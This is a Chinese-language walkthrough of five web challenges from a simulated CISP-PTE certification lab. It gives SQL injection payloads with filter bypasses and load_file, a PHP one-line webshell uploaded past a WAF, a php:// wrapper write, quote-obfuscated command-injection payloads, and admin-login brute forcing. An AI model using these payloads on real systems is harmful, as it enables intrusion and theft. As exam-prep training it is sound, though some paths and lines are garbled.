CSIP-PTE安全认证实操题有五道web题,一道综合题,这篇文章只分享5道web题,此靶场为模拟靶场。
通过页面提示,我们要利用sql注入读取/tmp/360/key文件,读取的话就要用到load_file命令来去获取文件信息
通过测试得知,该传值方式为POST方式传值,这里也可以看到返回的sql语句。
输入id=1’) and 1#,发现返回的sql语句过滤了空格。
将空格用/**/代替,值正常返回构造sql语句,查看有多少个显示位,当显示位为5时,则页面不显示数据,所以有4个显示位。
id=1')/**/order/**/by/**/5#
通过联合查询来获取显示位,发现union被过滤
id=-1')/**/union/**/select/**/1,2,3,4#
尝试双写union来绕过
id=-1')/**/ununionion/**/select/**/1,2,3,4#
利用load_file来获取flag值
id=-1')/**/ununionion/**/select/**/1,2,3,load_file('/tmp/360/key')#
通过提示得知,需要绕过waf才能上传文件至服务器,flag在/key.php中。
先编写一句话木马,将一句话木马保存在eval.php中
<?php @eval($_POST[shell])?>
通过burp去重放去修改,尝试绕过waf。
将文件后缀名修改成pht,将文件类型修改成image/gif 添加文件头GIF89a,点击发送
可以看到上传成功,利用中国蚁剑连接。
查看key.php文件
通过url可以得知是GET传值,可以利用伪协议写入一句话木马
'); fclose($a); ?>
连接成功
得到flag
在输入框内依次输入’$,$$,|,||,;'看哪些被过滤了
发现都没过滤,我个人喜欢用‘;’,所以下列情况则是通过‘;’来测试。
输入;find / -name "key.php"
找到key.php的路径,那么只需要通过cat去看key.php内容即可
;cat /app/key.php
cat被过滤了,那么用另外的方式去查看该文件
;grep '' /app/key.php
出来了一句话,但没有完全显示
F12查看代码,得到flag
通过提示,我们应该重点关注IP为172.16.12.12的操作,将日志文件下载下来,具体分析。
首先筛选出IP,ctrl+f打开查找,输入IP,点击在当前文件中查找
就会得到下列的搜索结果,再将其过滤一遍,只搜索返回值为200的数据。
右键点击在此搜索结果中查找数据
搜索关键字:200
可以看到这里有个疑似是管理后台的url
在浏览器将其打开
利用爆破尝试爆破账号,密码
发现账号:admin 密码:password123页面状态码为302,可能发生跳转
尝试登录,得到flag
个人觉得这个命令注入是最简单的。
在这之前先来了解下读文件都可以用哪些命令吧。
cat、tac、nl、more、less、head、tail
cat 文件名 将文件内容显示在屏幕上
cat -n 文件名 将文件内容显示在屏幕上,并显示行号
cat -b 文件名 将文件内容显示在屏幕上,并显示行号,但是不显示空白行行号
tac 文件名 将文件内容显示在屏幕上,但是是从最后一行开始往前显示
tac -s separator 文件名 –从separator往后倒序输出,倒序输出不包含separator,输出到最后一行再按照顺序将separator之前的内容输出
tac -b -s separator 文件名 –从separator往后倒序输出,倒序输出包含separator,输出到最后一行再按照顺序将separator之前的内容输出
nl 文件名 (就是nl -b t 文件名) 使用nl指令肯定是显示行号的,主要是操作行号如何显示
nl -b a 文件名 显示行号,空行也显示行号
nl -b t 文件名 显示行号,空行不显示行号(默认值)
nl -w 数字x 文件名 行号字段所占用的位数
nl -n ln 文件名 行号在字段最前方那段空间最左端显示
nl -n rn 文件名 行号在字段最前方那段空间最右端端显示,且不加0
nl -n rz 文件名 行号在字段最前方那段空间最右端端显示,且加0
more 文件名
less 文件名
haed 文件名 –显示文件头十行
tail文件名 –显示文件尾部
直接构造payload:
127.0.0.1 | tac …/key.php
经测试,以下payload均可完成这道题。
127.0.0.1 | less …/key.php
127.0.0.1 | m’or’e …/key.php
127.0.0.1 | tail …/key.php
127.0.0.1 | v’'i …/key.php
127.0.0.1 | c’a’t …/key.php
127.0.0.1 | head …/key.php
127.0.0.1 | nl …/key.php
|od -c …/key.php
|xxd …/key.php
|xxd …/key.php|grep key
|grep “key” …/key.php
|sed -n ‘1,5p’ …/key.php|grep key
直接用刚才的payload试:
127.0.0.1 | m’or’e …/key.php
经测试这个靶场可以用的payload:
127.0.0.1 | v’'i …/key.php
127.0.0.1 | c’a’t …/key.php
127.0.0.1 |xxd …/key.php
127.0.0.1 |grep “key” …/key.php